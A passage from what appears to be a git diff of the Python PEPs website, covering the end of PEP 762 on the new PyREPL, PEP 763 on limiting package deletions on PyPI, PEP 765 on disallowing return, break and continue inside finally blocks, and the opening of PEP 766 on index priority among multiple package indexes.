Although this means that existing readline/editline configurations will not be +compatible with the PyREPL, we believe the enhanced features and improved +extensibility are an overall win. See “Backwards Compatibility” for discussion +of continued support for customized workflows.

+

The previous REPL made it challenging to properly implement custom commands, +which is a very common feature of interactive shells. For instance, the exit +command was implemented as a method call of a custom object injected in the +global namespace, leading to unintuitive behavior that often confuses users when +they simply type exit, as the interpreter prompts them to the supposedly +correct usage exit().

+
+
+

Specification

+

PyREPL is implemented as a new private Python module called _pyrepl, existing +alongside the current C implementation. In its first implementation, it +introduces the following key features:

+
    +
  1. Multi-line History and Editing: Users are able to navigate and edit their +command history across multiple lines, improving the ability to refine and reuse +complex blocks of code.

    Editing multi-line blocks provides automatic indentation using four spaces, which +is consistent with PEP 8 recommendations. When a line ending with a colon is +encountered, the following line is automatically indented utilizing the +indentation pattern that is inferred from the first line that contains +indentation. Lines are indented with four spaces, and tabs are converted into +spaces.

    +

    Users can access history of commands by using up and down arrows. Within +a multi-line entry, the arrow keys navigate line-by-line within the block before +moving to the next history entry. The down arrow works in reverse, navigating +from older entries to the most recent.

    +

    History can be searched forward (using Ctrl+S) and in reverse (using Ctrl+R) +using a custom-specified substring query. It can also be searched with a prefix +query by entering the prefix into a shell line and using PageUp and PageDown +keys.

    +
  2. +
  3. Copying and Pasting: in supported terminal emulators, bracketed pasting +capability is discovered and used by PyREPL. This allows for transparent pasting +of blocks of code without immediate execution or invalid automatic indentation.

    For terminal emulators that don’t support this mode, a dedicated paste mode is +implemented to allow for easy insertion of multi-line code snippets without +triggering immediate execution or indentation issues.

    +

    Users enter manual paste mode by hitting the F3 key. The prompt changes from +>>> to (paste) where users can paste contents from their clipboard or +manually type as desired. Once the content is ready, hitting F3 exits paste +mode. Then, pressing Enter executes the block.

    +

    Users can enter multiple commands on a single input when using paste mode, which +will help paste code from other sources.

    +

    To copy blocks of code without the leading command prompts and without the +output of the commands, users can enter the history view via the F2 key. This +mode uses a pager to display history of executed commands without the prompts +and output.

    +
  4. +
  5. Help via F1.

    Access to the standard Help module is accessible via a Custom Command help +(see below) or via the F1 key. Hit F1 to enter help mode. When you’re done, hit +F1 or a standard command (q, quit or exit) to exit.

    +

    Browsing interactive help does not retain command history.

    +
  6. +
  7. Custom Commands: The REPL supports the implementation of custom commands, +such as exit, in a more natural and user-friendly manner, avoiding the current +function call workaround.

    The initial list of custom commands includes:

    +
      +
    • exit
    • +
    • quit
    • +
    • copyright
    • +
    • help
    • +
    • clear
    • +
    +

    Commands are available as long as there is no name conflict with a variable in a +reachable scope. For example, after assigning exit = 1, the variable will +take precedence over PyREPL commands. del exit in this case will remove the +conflict and the command will function again.

    +
  8. +
  9. Colors: the prompts as well as certain elements of the output, like exception +tracebacks, are now colored. Colors can be disabled using the standard +NO_COLOR environment variable, or forced by using the standard +FORCE_COLOR environment variable. A Python-specific environment variable is +also available called PYTHON_COLORS. The initial implementation in Python +3.13 does not offer customization of the color theme.
  10. +
+

These features are significantly enhancing the interactive Python experience, +bringing it more in line with modern development environments and user +expectations. The implementation is in Python, offering several advantages:

+
    +
  1. Easier Testing and Validation: Writing tests for Python code is dramatically +simpler and more straightforward than for C code, allowing for more +comprehensive test coverage of all existing and old features.
  2. +
  3. Lower Contribution Barrier: Python’s accessibility compared to C has been +encouraging more community contributions, leading to faster feature development +and bug fixes.
  4. +
  5. Flexibility: A Python implementation is easier to extend and modify, +improving developer velocity on new features and improvements by core developers +and contributors alike.
  6. +
+
+
+

Backwards Compatibility

+

The PyREPL implementation is designed to maintain full backward compatibility +with existing Python code as the old basic REPL will be preserved as a fallback +and is available on demand, in case custom workflows require it. It will also be +used in cases where the new REPL cannot be used due to environmental constraints +or other issues. Users have the option to explicitly choose the old basic REPL +by setting the environment variable PYTHON_BASIC_REPL to 1. This ensures +that users can continue using the familiar interface and capabilities if they +prefer, or if they encounter any issues with the new implementation.

+

It’s important to emphasize that the introduction of PyREPL does not remove any +existing functionality. Any functionality of the old basic REPL unavailable in +PyREPL is preserved and maintained in the old basic REPL that can be used by +users as a fallback.

+

In particular, users wanting to continue using their custom input configuration +in inputrc or editrc files can continue using the old basic REPL.

+

The authors do not expect any PyREPL functionality to be ported to the old basic +REPL. Similarly, inputrc and editrc support is explicitly not planned in +PyREPL. Those configuration files are provided by and parsed by “readline” and +“editline” libraries, and their functional scope does not match the +functionality PyREPL is targeting.

+

To facilitate a smooth transition, clear documentation +is provided on how to switch between PyREPL and the old basic REPL.

+

This approach ensures that while we’re introducing significant improvements with +the new REPL, we’re not forcing any immediate changes on users who rely on the +current implementation. The fallback mechanism and user choice option provide a +safety net that allows for gradual adoption of the new REPL while maintaining +all existing functionality.

+
+
+

Security Implications

+

There are no security implications derived from this proposal.

+
+
+

How to Teach This

+

The introduction of PyREPL is accompanied by documentation and tutorials. Key +areas of focus for education will include:

+
    +
  1. Detailed explanations on using multi-line editing, paste mode, and other new +features.
  2. +
  3. Custom commands (existing and new).
  4. +
  5. How to switch to the new REPL, including any +differences from the previous readline/editline-based configuration.
  6. +
+
+
+

Rejected Ideas

+

Several alternative approaches were considered and ultimately rejected:

+
    +
  1. Extending the current C implementation: While this would maintain maximum +backwards compatibility, it was deemed too complex and would not address the +fundamental limitations described ut supra.
  2. +
  3. Developing a new REPL from scratch: This approach was rejected due to the +complexity of creating a cross-platform terminal application and the desire to +leverage existing, proven code.
  4. +
  5. Using other existing REPL implementations: The authors looked at several +alternatives like IPython, +bpython, +ptpython, and +xonsh. While all the above are impressive projects, +in the end PyREPL was chosen for its combination of maturity, feature set, +and lack of additional dependencies. Another key factor was the alignment +with PyPy’s implementation.
  6. +
+
+
+

Acknowledgments

+

Thanks to Diego Russo for providing feedback on drafts of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0762.rst

+

Last modified: 2024-10-14 18:54:23 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0763/index.html b/pep-0763/index.html new file mode 100644 index 00000000000..41a1ec3967d --- /dev/null +++ b/pep-0763/index.html @@ -0,0 +1,557 @@ + + + + + + + + PEP 763 – Limiting deletions on PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 763 – Limiting deletions on PyPI

+
+
Author:
+
William Woodruff <william at yossarian.net>, +Alexis Challande <alexis.challande at trailofbits.com>
+
Sponsor:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
24-Oct-2024
+
Post-History:
+
09-Jul-2022, +01-Oct-2024, +28-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

We propose limiting when users can delete files, releases, and projects +from PyPI. A project, release, or file may only be deleted within 72 hours +of when it is uploaded to the index. From this point, users may only use +the “yank” mechanism specified by PEP 592.

+

An exception to this restriction is made for releases and files that are +marked with pre-release specifiers, +which will remain deletable at any time. +The PyPI administrators will retain the ability to delete files, releases, +and projects at any time, for example for moderation or security purposes.

+
+
+

Rationale and Motivation

+

As observed in PEP 592, user-level deletion of projects on PyPI +enables a catch-22 situation of dependency breakage:

+
+
Whenever a project detects that a particular release on PyPI might be +broken, they oftentimes will want to prevent further users from +inadvertently using that version. However, the obvious solution of +deleting the existing file from a repository will break users who have +pinned to a specific version of the project.

This leaves projects in a catch-22 situation where new projects may be pulling +down this known broken version, but if they do anything to prevent that they’ll +break projects that are already using it.

+
+

On a technical level, the problem of deletion is mitigated by +“yanking,” also specified in PEP 592. However, deletions continue to be +allowed on PyPI, and have caused multiple notable disruptions to the Python +ecosystem over the interceding years:

+
    +
  • July 2022: atomicwrites +was deleted by its maintainer +in an attempt to remove the project’s “critical” designation, without the +maintainer realizing that project deletion would also delete all previously +uploaded releases.

    The project was subsequently restored with the maintainer’s consent, +but at the cost of manual administrator action and extensive downstream +breakage to projects like pytest. +As of October 2024, atomicwrites is archived but still has +around 4.5 million monthly downloads from PyPI.

    +
  • +
  • April 2023: codecov was deleted by +its maintainers after a long deprecation period. This caused extensive +breakage for many of Codecov’s CI/CD users, who were unaware of the +deprecation period due to limited observability of deprecation warnings +within CI/CD logs.

    The project was +subsequently re-created +by its maintainers, with a new release published to compensate for the deleted releases +(which were not restored), meaning that any pinned installations remained +broken. As of October 2024, this single release remains the only release on +PyPI and has around +1.5 million monthly downloads.

    +
  • +
  • June 2023: python-sonarqube-api +deleted all released releases prior to 2.0.2.

    The project’s maintainer subsequently +deleted conversations +and force-pushed over the tag history for python-sonarqube-api’s source +repository, impeding efforts by users to compare changes between +releases.

    +
  • +
  • June 2024: PySimpleGUI changed +licenses and deleted +nearly all previous releases. +This resulted in widespread disruption for users, who (prior to the +relicensing) were downloading PySimpleGUI approximately 25,000 times a day.
  • +
+

In addition to their disruptive effect on downstreams, deletions +also have detrimental effects on PyPI’s sustainability as well as the overall +security of the ecosystem:

+
    +
  • Deletions increase support workload for PyPI’s administrators and +moderators, as users mistakenly file support requests believing that PyPI +is broken, or that the administrators themselves have removed the +project.
  • +
  • Deletions impair external (meaning end-user) incident response and analysis, +making it difficult to distinguish “good faith” maintainer behavior from +a malicious actor attempting the cover their tracks.
  • +
+

The Python ecosystem is continuing to grow, +meaning that future deletions of projects can be reasonably assumed to +be just, as if not more, disruptive than the deletions sampled above.

+

Given all of the above, this PEP concludes that deletions now present a greater +risk and detriment to the Python ecosystem than a benefit.

+

In addition to these technical arguments, there is also precedent +from other packaging ecosystems for limiting the ability of users to delete +projects and their constituent releases. This precedent is documented in +Appendix A.

+
+
+

Specification

+

There are three different types of deletable objects:

+
    +
  1. Files, which are individual project distributions (such as source +distributions or wheels).

    Example: requests-2.32.3-py3-none-any.whl.

    +
  2. +
  3. Releases, which contain one or more files that share the same version +number.

    Example: requests v2.32.3.

    +
  4. +
  5. Projects, which contain one or more releases.

    Example: requests.

    +
  6. +
+
+

Deletion eligibility rules

+

This PEP proposes the following deletion eligibility rules:

+
    +
  • A file is deletable if and only if it was uploaded to +PyPI less than 72 hours from the current time, or if it +has a pre-release specifier.
  • +
  • A release is deletable if and only if all of its +contained files are deletable.
  • +
  • A project is deletable if and only if all of its releases are deletable.
  • +
+

These rules allow new projects to be +deleted entirely, and allow old projects to delete new files or releases, +but do not allow old projects to delete old files or releases.

+
+
+
+

Implementation

+

This PEP’s implementation primarily concerns aspects of PyPI that are not +standardized or subject to standardization, such as the web interface and +signed-in user operations. As a result, this section describes its +implementation in behavioral terms.

+
+

Changes

+
    +
  • Per the eligibility rules above, PyPI will reject web interface requests +(using an appropriate HTTP response code of its choosing) for +file, release, or project deletion if the respective object is not +eligible for deletion.
  • +
  • PyPI will amend its web interface to indicate a file/release/project’s +deletion ineligibility, e.g. by styling the relevant UI elements as “inactive” +and making relevant bottoms/forms unclickable.
  • +
+
+
+
+

Security Implications

+

This PEP does not identify negative security implications associated with the +proposed approach.

+

This PEP identifies one minor positive security implication: by restricting +user-controlled deletions, this PEP makes it more difficult for a malicious +actor to cover their tracks by deleting malware from the index. This is +particularly useful for external (i.e. non-PyPI administrator) triage and +incident response, where the defending party needs easy access to malware +samples to develop indicators of compromise.

+
+
+

How To Teach This

+

This PEP suggests at least two pieces of public-facing material to help +the larger Python packaging community (and its downstream consumers) +understand its changes:

+
    +
  • An announcement post on the PyPI blog explaining +the nature of the PEP, its motivations, and its behavioral implications for +PyPI.
  • +
  • An announcement banner on PyPI itself, linking to the above.
  • +
  • Updates to the PyPI user documentation explaining +the difference between deletion and yanking and the limited conditions under +which the former can still be initiated by package owners.
  • +
+
+
+

Rejected Ideas

+
+

Conditioning deletion on dependency relationships

+

An alternative to time-based deletion windows is deletion eligibility based on +downstream dependents. For example, a release could be considered deletable +if and only if it has fewer than N downstream dependents on PyPI, +where N could be as low as 1.

+

This idea is appealing since it directly links deletion eligibility to +disruptiveness. npm uses it and +conditions project removal on the absence of any downstream dependencies +known to the index.

+

Despite its appeal, this PEP identifies several disadvantages and technical +limitations that make dependency-conditioned deletion not appropriate +for PyPI:

+
    +
  1. PyPI is not aware of dependency relationships. In Python packaging, +both project builds and metadata generation are frequently dynamic +operations, involving arbitrary project-specified code. This is typified +by source distributions containing setup.py scripts, where the execution +of setup.py is responsible for computing the set of dependencies +encoded in the project’s metadata.

    This is in marked contrast to ecosystems like npm and Rust’s +crates, where project builds can be dynamic but +the project’s metadata itself is static.

    +

    As a result of this, PyPI doesn’t know your project’s dependencies, +and is architecturally incapable of knowing them without either running +arbitrary code (a significant security risk) or performing a long-tail +deprecation of setup.py-based builds in favor of PEP 517 and +PEP 621-style static metadata.

    +
  2. +
  3. Results in an unintuitive permissions model. Dependency-conditioned +deletion results in a “reversed” power relationship, where anybody +who introduces a dependency on a project can prevent that project from +being deleted.

    This is reasonable on face value, but can be abused to produce unexpected +and undesirable (in the context of enabling some deletions) outcomes. +A notable example of this is npm’s +everything package, which +depends on every public package on npm (as of 30 Dec 2023) and thereby +prevents their deletion.

    +
  4. +
+
+
+

Conditioning deletion on download count

+

Another alternative to time-based deletion windows is to delete based on the +number of downloads. For example, a release could be considered deletable if +and only if it has fewer than N downloads during the last period.

+

While presenting advantages by tying a project deletion possibility to its +usage, this PEP identifies several limitations to this approach:

+
    +
  1. Ecosystem diversity. The Python ecosystem includes projects with widely +varying usage patterns. A fixed download threshold would not adequately account +for niche but critical projects with naturally low download counts.
  2. +
  3. Time sensitivity. Download counts do not necessarily reflect a project’s +current status or importance. A previously popular project might have low +recent downloads but still be crucial for maintaining older systems.
  4. +
  5. Technical complexity. Accessing the download count of a project within +PyPI is not straightforward, and there is limited possibility to gather a +project’s download statistics from mirrors or other distributions systems.
  6. +
+
+
+
+

Appendix A: Precedent in other ecosystems

+

The following is a table of support for deletion in different packaging +ecosystems. An ecosystem is considered to not support deletion +if it restrict’s a user’s ability to perform deletions in a manner similar +to this PEP.

+

An earlier version of this table, showing only deletion, was +compiled by Donald Stufft and others on the Python discussion forum in +July 2022.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Ecosystem (Index)DeletionYankingNotes
Python (PyPI)[1][2]Deletion currently completely unrestricted.
Rust (crates.io)[3]Deletion by users not allowed at all.
JavaScript (npm)[4][5]Deletion is limited by criteria similar to this PEP.
Ruby (RubyGems)[6]RubyGems calls deletion “yanking.” Yanking in PyPI’s terms is not supported at all.
Java (Maven Central)[7]Deletion by users not allowed at all.
PHP (Packagist)[8]Deletion restricted after an undocumented number of installs.
.NET (NuGet)[9][10]NuGet calls yanking “unlisting.”
Elixir (Hex)[11][11]Hex calls yanking “retiring.”
R (CRAN)[12][12]Deletion is limited to within 24 hours of initial release or +60 minutes for subsequent versions. CRAN calls yanking “archiving.”
Perl (CPAN)Yanking is not supported at all. Deletion seemingly encouraged, +at least as of 2021 [13].
Lua (LuaRocks)[14][14]LuaRocks calls yanking “archiving.”
Haskell (Hackage)[15][16]Hackage calls yanking “deprecating.”
OCaml (OPAM)[17][17]Deletion is allowed if it occurs “reasonably soon” after inclusion. +Yanking is de facto supported by the available: false marker, which +effectively disables resolution.
+

The following trends are present:

+
    +
  • A strong majority of indices do not support deletion (9 vs. 4)
  • +
  • A strong majority of indices do support yanking (9 vs. 4)
  • +
  • An overwhelming majority of indices support one or the other or neither, +but not both (11 vs. 2)
      +
    • PyPI and LuaRocks are notable outliers in supporting both deletion and +yanking.
    • +
    +
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0763.rst

+

Last modified: 2024-10-28 23:59:04 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0765/index.html b/pep-0765/index.html new file mode 100644 index 00000000000..cfd533ad2b3 --- /dev/null +++ b/pep-0765/index.html @@ -0,0 +1,487 @@ + + + + + + + + PEP 765 – Disallow return/break/continue that exit a finally block | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 765 – Disallow return/break/continue that exit a finally block

+
+
Author:
+
Irit Katriel <irit at python.org>, Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
15-Nov-2024
+
Python-Version:
+
3.14
+
Post-History:
+
09-Nov-2024, +16-Nov-2024
+
Replaces:
+
601
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to withdraw support for return, break and +continue statements that break out of a finally block. +This was proposed in the past by PEP 601. The current PEP +is based on empirical evidence regarding the cost/benefit of +this change, which did not exist at the time that PEP 601 +was rejected. It also proposes a slightly different solution +than that which was proposed by PEP 601.

+
+
+

Motivation

+

The semantics of return, break and continue in a +finally block are surprising for many developers. +The documentation mentions that:

+
    +
  • If the finally clause executes a break, continue +or return statement, exceptions are not re-raised.
  • +
  • If a finally clause includes a return statement, the +returned value will be the one from the finally clause’s +return statement, not the value from the try clause’s +return statement.
  • +
+

Both of these behaviours cause confusion, but the first is +particularly dangerous because a swallowed exception is more +likely to slip through testing, than an incorrect return value.

+

In 2019, PEP 601 proposed to change Python to emit a +SyntaxWarning for a few releases and then turn it into a +SyntaxError. It was rejected in favour of viewing this +as a programming style issue, to be handled by linters and PEP 8. +Indeed, PEP 8 now recommends not to use control flow statements +in a finally block, and linters such as +Pylint, +Ruff and +flake8-bugbear +flag them as a problem.

+
+
+

Rationale

+

A recent +analysis of real world code shows that:

+
    +
  • These features are rare (2 per million LOC in the top 8,000 PyPI +packages, 4 per million LOC in a random selection of packages). +This could be thanks to the linters that flag this pattern.
  • +
  • Most of the usages are incorrect, and introduce unintended +exception-swallowing bugs.
  • +
  • Code owners are typically receptive to fixing the bugs, and +find that easy to do.
  • +
+

See the appendix for more details.

+

This new data indicates that it would benefit Python’s users if +Python itself moved them away from this harmful feature.

+

One of the arguments brought up in +the PEP 601 discussion +was that language features should be orthogonal, and combine without +context-based restrictions. However, in the meantime PEP 654 has +been implemented, and it forbids return, break and continue +in an except* clause because the semantics of that would violate +the property that except* clauses operate in parallel, so the +code of one clause should not suppress the invocation of another. +In that case we accepted that a combination of features can be +harmful enough that it makes sense to disallow it.

+
+
+

Specification

+

The change is to specify as part of the language spec that +Python’s compiler may emit a SyntaxWarning or SyntaxError +when a return, break or continue would transfer +control flow from within a finally block to a location outside +of it.

+

These examples may emit a SyntaxWarning or SyntaxError:

+
 def f():
+     try:
+         ...
+     finally:
+         return 42
+
+ for x in o:
+     try:
+         ...
+     finally:
+         break  # (or continue)
+
+
+

These examples would not emit the warning or error:

+
 try:
+     ...
+ finally:
+     def f():
+         return 42
+
+ try:
+     ...
+ finally:
+     for x in o:
+         break  # (or continue)
+
+
+

CPython will emit a SyntaxWarning in version 3.14, and we leave +it open whether, and when, this will become a SyntaxError. +However, we specify here that a SyntaxError is permitted by +the language spec, so that other Python implementations can choose +to implement that.

+

The CPython implementation will emit the SyntaxWarning during +AST construction, to ensure that the warning will show up during +static anlaysis and compilation, but not during execution of +pre-compiled code. We expect that the warning will be seen by a +project maintainer (when they run static analysis, or CI which +does not have precompiled files). However, end users of a project +will only see a warning if they skip precompilation at installation +time, check installation time warnings, or run static analysis over +their dependencies.

+
+
+

Backwards Compatibility

+

For backwards compatibility reasons, we are proposing that CPython +emit only a SyntaxWarning, with no concrete plan to upgrade that +to an error. Code running with -We may stop working once this +is introduced.

+
+
+

Security Implications

+

The warning/error will help programmers avoid some hard to find bugs, +so will have a security benefit. We are not aware of security issues +related to raising a new SyntaxWarning or SyntaxError.

+
+
+

How to Teach This

+

The change will be documented in the language spec and in the +What’s New documentation. The SyntaxWarning will alert users +that their code needs to change. The empirical evidence +shows that the changes necessary are typically quite +straightforward.

+
+
+

Rejected Ideas

+
+

Emit SyntaxError in CPython

+

PEP 601 proposed that CPython would emit SyntaxWarning for a couple of +releases and SyntaxError afterwards. We are leaving it open whether, and +when, this will become a SyntaxError in CPython, because we believe that a +SyntaxWarning would provide most of the benefit with less risk.

+
+
+

Change Semantics

+

It was suggested +to change the semantics of control flow instructions in finally such that an +in-flight exception takes precedence over them. In other words, a return, +break or continue would be permitted, and would exit the finally +block, but the exception would still be raised.

+

This was rejected for two reasons. First, it would change the semantics of +working code in a way that can be hard to debug: a finally that was written +with the intention of swallowing all exceptions (correctly using the documented +semantics) would now allow the exception to propagate on. This may happen only +in rare edge cases at runtime, and is not guaranteed to be detected in testing. +Even if the code is wrong, and has an exception swallowing bug, it could be +hard for users to understand why a program started raising exceptions in 3.14, +while it did not in 3.13. +In contrast, a SyntaxWarning is likely to be seen during testing, it would +point to the precise location of the problem in the code, and it would not +prevent the program from running.

+

The second objection was about the proposed semantics. The motivation for +allowing control flow statements is not that this would be useful, but rather +the desire for orthogonality of features (which, as we mentioned in the +introduction, is already violated in the case of except* clauses). However, +the proposed semantics are complicated because they suggest that return, +break and continue behave as they normally do when finally executes +without an in-flight exception, but turn into something like a bare raise +when there is one. It is hard to claim that the features are orthogonal if +the presence of one changes the semantics of the other.

+
+
+
+

Appendix

+
+

return in finally considered harmful

+

Below is an abridged version of a +research report +by Irit Katriel, which was posted on 9 Nov 2024. +It describes an investigation into usage of return, break and continue +in a finally clause in real world code, addressing the +questions: Are people using it? How often are they using it incorrectly? +How much churn would the proposed change create?

+
+

Method

+

The analysis is based on the 8,000 most popular PyPI packages, in terms of number +of downloads in the last 30 days. They were downloaded on the 17th-18th of +October, using +a script +written by Guido van Rossum, which in turn relies on Hugo van Kemenade’s +tool that creates a list of the +most popular packages.

+

Once downloaded, a +second script +was used to construct an AST for each file, and traverse it to identify break, +continue and return statements which are directly inside a finally block.

+

I then found the current source code for each occurrence, and categorized it. For +cases where the code seems incorrect, I created an issue in the project’s bug +tracker. The responses to these issues are also part of the data collected in +this investigation.

+
+
+

Results

+

I decided not to include a list of the incorrect usages, out of concern that +it would make this report look like a shaming exercise. Instead I will describe +the results in general terms, but will mention that some of the problems I found +appear in very popular libraries, including a cloud security application. +For those so inclined, it should not be hard to replicate my analysis, as I +provided links to the scripts I used in the Method section.

+

The projects examined contained a total of 120,964,221 lines of Python code, +and among them the script found 203 instances of control flow instructions in a +finally block. Most were return, a handful were break, and none were +continue. Of these:

+
    +
  • 46 are correct, and appear in tests that target this pattern as a feature (e.g., +tests for linters that detect it).
  • +
  • 8 seem like they could be correct - either intentionally swallowing exceptions +or appearing where an active exception cannot occur. Despite being correct, it is +not hard to rewrite them to avoid the bad pattern, and it would make the code +clearer: deliberately swallowing exceptions can be more explicitly done with +except BaseException:, and return which doesn’t swallow exceptions can be +moved after the finally block.
  • +
  • 149 were clearly incorrect, and can lead to unintended swallowing of exceptions. +These are analyzed in the next section.
  • +
+

The Error Cases

+

Many of the error cases followed this pattern:

+
try:
+    ...
+except SomeSpecificError:
+    ...
+except Exception:
+    logger.log(...)
+finally:
+    return some_value
+
+
+

Code like this is obviously incorrect because it deliberately logs and swallows +Exception subclasses, while silently swallowing BaseExceptions. The intention +here is either to allow BaseExceptions to propagate on, or (if the author is +unaware of the BaseException issue), to log and swallow all exceptions. However, +even if the except Exception was changed to except BaseException, this code +would still have the problem that the finally block swallows all exceptions +raised from within the except block, and this is probably not the intention +(if it is, that can be made explicit with another try-except BaseException).

+

Another variation on the issue found in real code looks like this:

+
    try:
+        ...
+    except:
+        return NotImplemented
+    finally:
+        return some_value
+
+
+

Here the intention seems to be to return NotImplemented when an exception is +raised, but the return in the finally block would override the one in the +except block.

+
+

Note

+

Following the +discussion, +I repeated the analysis on a random selection of PyPI packages (to +analyze code written by average programmers). The sample contained +in total 77,398,892 lines of code with 316 instances of return/break/continue +in finally. So about 4 instances per million lines of code.

+
+

Author reactions

+

Of the 149 incorrect instances of return or break in a finally clause, +27 were out of date, in the sense that they do not appear in the main/master branch +of the library, as the code has been deleted or fixed by now. The remaining 122 +are in 73 different packages, and I created an issue in each one to alert the +authors to the problems. Within two weeks, 40 of the 73 issues received a reaction +from the code maintainers:

+
    +
  • 15 issues had a PR opened to fix the problem.
  • +
  • 20 received reactions acknowledging the problem as one worth looking into.
  • +
  • 3 replied that the code is no longer maintained so this won’t be fixed.
  • +
  • 2 closed the issue as “works as intended”, one said that they intend to +swallow all exceptions, but the other seemed unaware of the distinction +between Exception and BaseException.
  • +
+

One issue was linked to a pre-existing open issue about non-responsiveness to Ctrl-C, +conjecturing a connection.

+

Two of the issue were labelled as “good first issue”.

+

The correct usages

+

The 8 cases where the feature appears to be used correctly (in non-test code) also +deserve attention. These represent the “churn” that would be caused by blocking +the feature, because this is where working code will need to change. I did not +contact the authors in these cases, so we need to assess the difficulty of +making these changes ourselves. It is shown in +the full report, +that the change required in each case is small.

+
+
+

Discussion

+

The first thing to note is that return/break/continue in a finally +block is not something we see often: 203 instance in over 120 million lines +of code. This is, possibly, thanks to the linters that warn about this.

+

The second observation is that most of the usages were incorrect: 73% in our +sample (149 of 203).

+

Finally, the author responses were overwhelmingly positive. Of the 40 responses +received within two weeks, 35 acknowledged the issue, 15 of which also created +a PR to fix it. Only two thought that the code is fine as it is, and three +stated that the code is no longer maintained so they will not look into it.

+

The 8 instances where the code seems to work as intended, are not hard to +rewrite.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0765.rst

+

Last modified: 2024-12-12 12:05:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0766/index.html b/pep-0766/index.html new file mode 100644 index 00000000000..058de431d72 --- /dev/null +++ b/pep-0766/index.html @@ -0,0 +1,562 @@ + + + + + + + + PEP 766 – Explicit Priority Choices Among Multiple Indexes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 766 – Explicit Priority Choices Among Multiple Indexes

+
+
Author:
+
Michael Sarahan <msarahan at gmail.com>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
18-Nov-2024
+
Post-History:
+
18-Nov-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Package resolution is a key part of the Python user experience as the means of +extending Python’s core functionality. The experience of package resolution is +mostly taken for granted until someone encounters a situation where the package +installer does something they don’t expect. The installer behavior with +multiple indexes has been a common source of unexpected behavior. Through its ubiquity, pip has +long defined the standard expected behavior across other tools in the ecosystem, +but Python installers are diverging with respect to how they handle multiple +indexes. At the core of this divergence is whether index contents are combined +before resolving distributions, or each index is handled individually in order. +pip merges all indexes before matching distributions, while uv matches +distributions on one index before moving on to the next. Each approach has +advantages and disadvantages. This PEP aims to describe each of these +behaviors, which are referred to as “version priority” and “index priority” +respectively, so that community discussions and troubleshooting can share a +common vocabulary, and so that tools can implement predictable behavior based on +these descriptions.

+
+
+

Motivation

+

Python package users frequently find themselves in need of specifying an index +or package source other than PyPI. There are many reasons for external indexes +to exist:

+ +

In most of these cases, it is not desirable to completely forego PyPI. Instead, +users generally want PyPI to still be a source of packages, but a lower priority +source. Unfortunately, pip’s current design precludes this concept of priority. +Some Python installer tools have developed alternative ways to handle multiple +indexes that incorporate mechanisms to express index priority, such as uv +and PDM.

+

The innovation and the potential for customization is exciting, but it comes at +the risk of further fragmenting the python packaging ecosystem, which is already +perceived as one of Python’s weak points. The motivation of this PEP is to encourage +installers to provide more insight into how they handle multiple indexes, and to +provide a vocabulary that can be common to the broader community.

+
+
+

Specification

+
+

“Version priority”

+

This behavior is characterized by the installer always getting the +“best” version of a package, regardless of the index that it comes +from. “Best” is defined by the installer’s algorithm for optimizing +the various traits of a package, also factoring in user input (such as +preferring only binaries, or no binaries). While installers may differ +in their optimization criteria and user options, the general trait that +all version priority installers share is that the index +contents are collated prior to candidate selection.

+

Version priority is most useful when all configured indexes are equally trusted +and well-behaved regarding the distribution interchangeability assumption. +Mirrors are especially well-behaved in this regard. That interchangeability +assumption is what makes comparing distributions of a given package meaningful. +Without it, the installer is no longer comparing “apples to apples.” In +practice, it is common for different indexes to have files that have different +contents than other indexes, such as builds for special hardware, or differing +metadata for the same package. Version priority behavior can lead to +undesirable, unexpected outcomes in these cases, and this is where users +generally look for some kind of index priority. Additionally, when there is a +difference in trust among indexes, version priority does not provide a way to +prefer more trusted indexes over less trusted indexes. This has been exploited by +dependency confusion attacks, and PEP 708 was proposed as a way of +hard-coding a notion of trusted external indexes into the index.

+

The “version priority” name is new, and introduction of new terms should always +be minimized. This PEP looks toward the uv project, which refers to its implementation of the version priority +behavior +as “unsafe-best-match.” Naming is really hard here. On one hand, it +isn’t accurate to call pip’s default behavior intrinsically “unsafe.” +The addition of possibly malicious indexes is what +introduces concern with this behavior. PEP 708 added a way to restrict +installers from drawing packages from unexpected, potentially insecure +indexes. On the other hand, the term “best-match” is technically +correct, but also misleading. The “best match” varies by user and by +application. “Best” is technically correct in the sense that it is a +global optimum according to the match criteria specified above, but that +is not necessarily what is “best” in a user’s eyes. “Version priority” +is a proposed term that avoids the concerns with the uv terminology, +while approximating the behavior in the most user-identifiable way that +packages are compared.

+
+
+

“Index priority”

+

